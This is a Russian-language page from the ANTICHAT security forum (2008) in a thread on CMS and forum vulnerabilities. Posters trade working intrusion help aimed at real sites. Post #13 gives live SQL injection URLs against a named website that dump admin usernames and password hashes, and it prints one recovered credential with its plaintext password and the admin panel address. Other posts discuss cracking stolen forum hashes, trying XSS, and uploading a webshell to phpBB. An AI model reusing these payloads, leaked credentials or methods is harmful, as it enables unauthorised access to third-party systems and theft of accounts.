HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 14.08.2008, 17:25
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от viv  
Попробовал ввел Вашу строчку , но ни чего не отобразилось, нет префикса
1 Читать статьи
2 Убрать пробелы из урла
3 Префикс к чему? В schema находится ВСЯ информация обо ВСЕХ таблицах и колонках

К посту ниже:
Выполни Все рекоммендации

Последний раз редактировалось jokester; 14.08.2008 в 18:19.. Причина: Дополнил
 
Ответить с цитированием

  #12  
Старый 14.08.2008, 17:31
viv
Новичок
Регистрация: 14.08.2008
Сообщений: 3
Провел на форуме:
6327

Репутация: 0
По умолчанию

Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет
 
Ответить с цитированием

  #13  
Старый 15.08.2008, 04:08
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от viv  
Так со статьями понятно, читаем) но есть непонятки)
с schema понятно спасибо
а пробелов нет урл, ничего не отображается, я скопировал Вашу строчку , но ничего нет
всё работает говорят же пробелы убери )

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table+where+id=1/*

digit:30bf4fb4729f382ca2010fd445f1796d:mityap123

http://www.hardvision.ru/admin/

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw),3+fr om+foto.users+limit+0,1/*

Последний раз редактировалось ~!DoK_tOR!~; 15.08.2008 в 04:13..
 
Ответить с цитированием

  #14  
Старый 16.08.2008, 03:24
sher_or_wer
Новичок
Регистрация: 13.08.2008
Сообщений: 6
Провел на форуме:
27688

Репутация: 0
По умолчанию

Доброго времени суток.
У меня такая проблема на одном форуме IPB 2.1.6 с помощью эксплоита я нашел хеши, но куки требует ещё и сесион_айди, в экплоите он не может всё время говорит что-то типа зайдите попозже сейчас not exist. Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно. Если же толку нет расшифровывать то значит придется через xss пробовать чтоли? Но там с регистрацией проблемы стоит жесткий контроль на каждого регистрирующегося.
 
Ответить с цитированием

  #15  
Старый 16.08.2008, 03:35
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Цитата:
Сообщение от sher_or_wer  
Пожайлуста укажите где можно прочитать про расшифровку хэшей, более или менее поятно
https://forum.antichat.ru/thread76958.html
 
Ответить с цитированием

  #16  
Старый 16.08.2008, 03:43
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

sher_or_wer, сессию можно достать только когда юзер, который тебе нужен в онлайне, если не ошибаюсь. А хэши можно расшифровать на milw0rm.com и hashcracking.info. Или можешь побрутить сам с помощью PasswordsPro.
 
Ответить с цитированием

  #17  
Старый 16.08.2008, 19:51
sher_or_wer
Новичок
Регистрация: 13.08.2008
Сообщений: 6
Провел на форуме:
27688

Репутация: 0
По умолчанию

Спасибо за ответы ~!DoK_tOR!~ и n0ne
 
Ответить с цитированием

  #18  
Старый 17.08.2008, 14:43
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно
 
Ответить с цитированием

  #19  
Старый 17.08.2008, 19:24
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

Цитата:
Сообщение от Nea7  
кто каким способом заливает в пхпбб вебшелл?
конкретно под phpBB 2.0.21 нужно
читай
_http://forum.antichat.ru/thread24488.html
 
Ответить с цитированием

  #20  
Старый 17.08.2008, 19:40
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Цитата:
Сообщение от DimOnOID  
читай
_http://forum.antichat.ru/thread24488.html
прочитал и даже попробовал, 2 6 7 спосб
http://forum.antichat.ru/showpost.php?p=198446&postcount=3 результата не далт

смысл тыкать на тему, которая ниже этой? нету других способов\не знаешь так и пиши
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ